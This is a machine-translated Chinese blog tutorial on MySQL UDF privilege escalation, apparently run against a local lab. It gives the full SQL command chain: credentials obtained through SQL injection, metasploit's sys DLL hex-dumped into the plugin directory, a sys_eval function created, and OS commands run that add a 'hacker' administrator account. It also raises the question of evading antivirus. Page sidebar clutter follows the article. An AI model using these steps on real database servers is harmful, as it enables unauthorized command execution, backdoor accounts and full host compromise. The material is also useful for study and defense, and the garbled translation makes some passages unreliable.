当前位置:网站首页>MySQL (UDF authorization)
MySQL (UDF authorization)
2022-07-05 06:32:00 【Viva alive】
Mysql udf Raise the right
UDF
UDF yes MySQL User defined functions in . It was like DLL Write your own functions in , And then in MySQL Call them in .
Premise
- There is sql Inject holes
- Mysql File write read permission security_file_priv Value is empty
- Database users have file read and write permissions
- Database users allow other hosts to connect
step
- utilize sql Inject to get the database user name , password , Decrypt the password to get plain text
- Use osanda Users connect to the database
- see osanda User's rights
select * from mysql.user where user = substring_index(user(), '@', 1) \G;
Found to have all permissions
Write a UDF DLL library
Check the system architecture and type , Convenient for us to choose later udf file ( Yes 4 individual )
show variables like '%compile%';
** from MySQL 5.0.67 Start ,UDF The library must be included in plugin In the folder , have access to ‘@@plugin_dir’ The global variable finds the folder . Can be in mysql.ini View and edit this variable in the file .** But the default is not plugin This directory
select @@plugin_dir ;
If Mysql The version is 5.1.60 The following can be used
select 'xxx' into outfile 'F:/phpstudy_pro/Extensions/MySQL5.7.26/lib::$INDEX_ALLOCATION';
select 'xxx' into outfile 'F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin::$INDEX_ALLOCATION';
Create folder , But I tested 5.7.26 edition , These two lines sql sentence Cannot create folder 了 , May be Mysql Added a little security policy .
from MySQL 5.0.67 Start , The file must be located in the plug-in directory . The directory consists of plugin_dir The value of the system variable is given . If plugin_dir The value of is empty , Then applicable 5.0.67 Previously used behavior : The file must be located in the directory searched by the dynamic linker of the system .
In the old version , You can use DLL Upload the file to the following location and create a new UDF function .
- @@datadir
- @@basedir\bin
- C:\windows
- C:\windows\system
- C:\windows\system32
metasploit Built in with written udf file , It can be used by us
see udf.dll The location of
You can also go to github Get on the
https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql
Raise the right 32 The bit system is 32, Raise the right 64 The bit system is 64,windows System selection dll,linux System selection so
take udf.dll The file is converted into hexadecimal and saved on the local computer , I save it here to F:/phpstudy_pro/WWW/
Under the table of contents
select hex(load_file('F:/phpstudy_pro/WWW/lib_mysqludf_sys_64.dll')) into dumpfile 'F:/phpstudy_pro/WWW/udf.txt';
Then the just generated udf.txt Hexadecimal number exported to the destination host plugin Directory
select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000… into dumpfile "F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll";
There may be a mistake , Because the destination host does not plugin Catalog
At this time, create a lib/plugin Catalog
Export again and you will succeed
The destination host has udf.dll Documents are not enough , We still have to be in Mysql Create the functions you need to use
Although the author is udf.dll There are many functions defined in , But we only need one function , That is to say sys_eval()
sys_eval The role of
This function will execute system commands , And display on the screen passed to the standard output .( Follow sqlmap Of –os-shell It's about the same , however sqlmap System commands that cannot be executed , This sys_eval But it can be implemented successfully , See the effect later )
sys_eval The creation of
create function sys_eval returns string soname 'udf.dll';
sys_eval The test of
select * from mysql.func where name = 'sys_eval';
There are content , Proof of successful creation
sys_eval The deletion of
drop function sys_eval;
If you don't want to use this custom function, you can use this command to delete
Once created , You can use it
select sys_eval('dir');
Next, enter a point sqlmap Impossible orders , Don't say sqlmap 了 , Even if you execute such a command locally, you need to open the administrator identity to execute , It is Add users , And add users to the administrators group in
Use another one first cmd Look at the current users
And then I use sys_eval Function to create a user hacker
select sys_eval('net user hacker /add');
At this time, Firefox jumped out , A keen sense of smell smells something wrong , I hurriedly pressed the permission to calm his mood
The result shows a piece of garbled code , But it doesn't prevent us from adding users
Continue to view current users
More than a hacker user
The following will hacker User promoted to administrator
Use another one cmd View the users of the administrators group , Find out hacker Become an administrator ?
Is this what we often say udf Raise the right
Summary of difficulties
- lib/plugin How to use other methods to create ( It is impossible to manually create a )
- How to bypass anti-virus software such as Firefox
边栏推荐
- LSA Type Explanation - lsa-1 [type 1 LSA - router LSA] detailed explanation
- Find the combination number acwing 888 Find the combination number IV
- MySQL advanced part 2: MySQL architecture
- Redis-01. First meet redis
- How to generate an image from text on fly at runtime
- P3265 [jloi2015] equipment purchase
- 1. Create Oracle database manually
- Bit of MySQL_ OR、BIT_ Count function
- FFmpeg build下载(包含old version)
- 3. Oracle control file management
猜你喜欢
SQL三种连接:内连接、外连接、交叉连接
How to make water ripple effect? This wave of water ripple effect pulls full of retro feeling
Series of how MySQL works (VIII) 14 figures explain the atomicity of MySQL transactions and the principle of undo logging
MySQL怎么运行的系列(八)14张图说明白MySQL事务原子性和undo日志原理
求组合数 AcWing 887. 求组合数 III
高斯消元 AcWing 884. 高斯消元解异或線性方程組
There are three kinds of SQL connections: internal connection, external connection and cross connection
Knapsack problem acwing 9 Group knapsack problem
Game theory acwing 893 Set Nim game
中国剩余定理 AcWing 204. 表达整数的奇怪方式
随机推荐
How to set the drop-down arrow in the spinner- How to set dropdown arrow in spinner?
Game theory acwing 894 Split Nim game
What is socket? Basic introduction to socket
1. Create Oracle database manually
Niu Mei's math problems
PR automatically moves forward after deleting clips
MySQL advanced part 2: MySQL architecture
Record of problems in ollvm compilation
Sum of three terms (construction)
Alibaba established the enterprise digital intelligence service company "Lingyang" to focus on enterprise digital growth
Bash exercise 17 writing scripts to install the server side of FRP reverse proxy software
Day 2 document
2048 project realization
How to correctly ask questions in CSDN Q & A
Applicable to Net free barcode API [off] - free barcode API for NET [closed]
MySQL advanced part 2: SQL optimization
Vant weave swipecell sets multiple buttons
Ffmpeg build download (including old version)
Series of how MySQL works (VIII) 14 figures explain the atomicity of MySQL transactions and the principle of undo logging
求组合数 AcWing 889. 满足条件的01序列